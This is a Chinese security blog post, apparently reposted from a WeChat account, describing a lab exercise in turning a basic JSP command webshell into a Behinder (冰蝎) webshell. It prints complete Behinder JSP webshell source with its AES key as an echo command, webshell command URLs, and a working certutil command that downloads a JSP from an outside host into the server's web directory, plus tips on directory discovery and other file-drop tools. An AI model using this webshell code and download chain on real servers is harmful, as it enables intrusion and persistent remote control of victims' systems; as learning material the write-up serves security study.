杂项(1)jsp马一句话如何怼上线冰蝎

本文章仅供学习交流使用，文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担。请尊重原创，可以相互学习，虽说是记录生活，但也反感被人拿去盈利。

1. 背景情况：

事情的经过：朋友扔了一个比较好玩的场景给我，我试了许久，总算把冰蝎马怼了上去，在中途遇见了很多小技巧。所以说记录一下呗。

场景（靶场）如下：1. 已知小马的地址为 
http://xxx.xxx.xxx.xxx/pages/upload/pages/uploads/2022xxxxxxxxxx.jsp?pwd=023&i=whoami   2，无waf

        任务目标：把冰蝎马怼上去

2. 开始：

   system权限，
   第一种方式尝试（失败）：
   想到了直接开3389端口，创建账户，提升管理员，进行登录，远程连接3389，复制粘贴冰蝎即可。(但是靶场有防火墙，3389端口无法连接)。

   第二种方式尝试(失败)：
   通过cmd.exe 中的echo 写入冰蝎文件到web目录下面去

   echo ^<^%^@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" ^%^>^<^%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}^%^>^<^%if (request.getMethod().equals("POST")){String k="b29a20244559707e";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}^%^> >1.jsp

为什么会出现这个问题呢？因为我们不知道023这个马是什么内容。  我先去找了密码为023的jsp马

    发现其具体的内容
于是我在本地试着搭建了tomcat，尝试了下。

查了下原因，因为小马是Runtime.getRuntime().exec("命令")，echo 命令是一个内置命令，它并不是一个可执行文件，因此无法直接在命令行中执行。
若想要执行echo，则必须：
Runtime.getRuntime().exec("cmd.exe /c echo "hello world "")
或者
Runtime.getRuntime().exec(new String[] {"cmd", "/c", "echo Hello World"});

    第三种方式（应该可以执行成功）
    打算直接通过CS4.5直接powershell上线，或者通过msf直接上线。我简单在靶标上执行了下（不停转圈圈，爱的魔力转圈圈..） ：
http://xxx.xxx.xxx.xxx/pages/uploads/2022xxxxxxxxxx.jsp?pwd=023&i=powershell.exe%20whoami  
    并且CS4.5环境这些也懒得去搭建了，用朋友的CS4.5发现自己已经好久没有更新CS4.5的客户端，无了大语.。MSF呢，要弄的话，又得去vps安装，贼麻烦，算了算了。
    我在本地的环境中是执行成功了的

    第四种方式（失败，但也发现一些可以用的东西）
    换一个思路把，先看看它的路径这些，发现，dir 没有办法执行

    （如果在本机搭建的时候，会弹出警告，如果点击允许了，这个就可以执行，但是在靶场上，没人给我们点击允许）
    于是找他类似的指令，tree，刚开始的是，直接使用tree报错。
    tree C:\Windows\System32\

然后去看了下 C:WindowsSystem32  发现是tree.com 

于是  tree.com C:\Windows\System32\  

     tree.com 路径  /F  显示路径和文件 
于是在靶标上执行tree.com /f   不加路径，默认显示当前文件盘符下的

发现前人留下的马儿，延展出了新的思路。
        爆破前人留下的马儿的密码。
        直接通过cmd命令去读取别人的文件。

        试了下，爆破了下，别人专用的，破不开
    读取文件的方式：
1. 使用 type 命令：该命令可用于显示指定文件的内容。例如，要读取名为 "test.txt" 的文本文件，请在命令提示符下键入以下命令并按 Enter 键：type test.txt

2.使用 more 命令：该命令可用于分页显示长文件的内容。例如，要读取名为 "longfile.txt" 的大型文本文件，请键入以下命令：more longfile.txt

3.使用 less 命令：该命令与 more 类似，但它提供了更多的交互式选项。如果您已经安装了 Cygwin 或 Git，那么可以使用 less 命令。例如，要读取名为 "log.txt" 的日志文件，请键入以下命令：less log.txt

4.使用 find 命令：该命令可用于查找匹配特定字符串的行。例如，在名为 "data.txt" 的文本文件中查找包含单词 "searchword" 的行，请键入以下命令：find "searchword" data.txt

   第五种方式（读取别人的马儿，应该可以成功，但是我失败了）  
   第六种方式（通过certutil.exe，其实早该想到了，只是用不习惯certutil.exe，一直没去尝试而已。成功！！）：
    通过自带的certutil.exe 下载到服务器上去。
    http://xxx.xxx.xxx.xxx/pages/uploads/2022xxxxxxxxxx.jsp?pwd=023&i=certutil -urlcache -split -f http://xxx.xxx.xxx.xxx/Edu.jsp D:/xxx/xxxx/Edu.jsp
    这里的一个注意的点，就是 / 和  区别。当时上传上去，一直没有在目录下，最后才发现是/   的原因。    / => 进行url编码执行 ,最终才会保存在目标目录中。

使用 " " 并没有保存至目标目录中

使用 " / " -> 进行url编码可以。

扩展思路：windows文件落地：
    bitsadmin  命令     powershell 命令    mshta     命令.........很多

3. 总结：

    也许这为上传一句话后，苦于没办法冰蝎，哥斯拉等提供了一些思路吧。总的来说，就是tree.com（寻目录）+ certutil.exe （存文件） 。4.唉，总会出现一些奇奇怪怪的问题。慢慢来就好。

4. 唠嗑唠嗑：

    有时候，我们总是以为结果是理所当然，但其中的过程确实是漫长的，难受的。愿我们能够坚持到最后，去迎接属于我们自己的成就。

本文章仅供学习交流使用，文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担。请尊重原创，可以相互学习，虽说是记录生活，但也反感被人拿去盈利。

原文始发于微信公众号（哈拉少安全小队）：杂项(1)--jsp马一句话如何怼上线冰蝎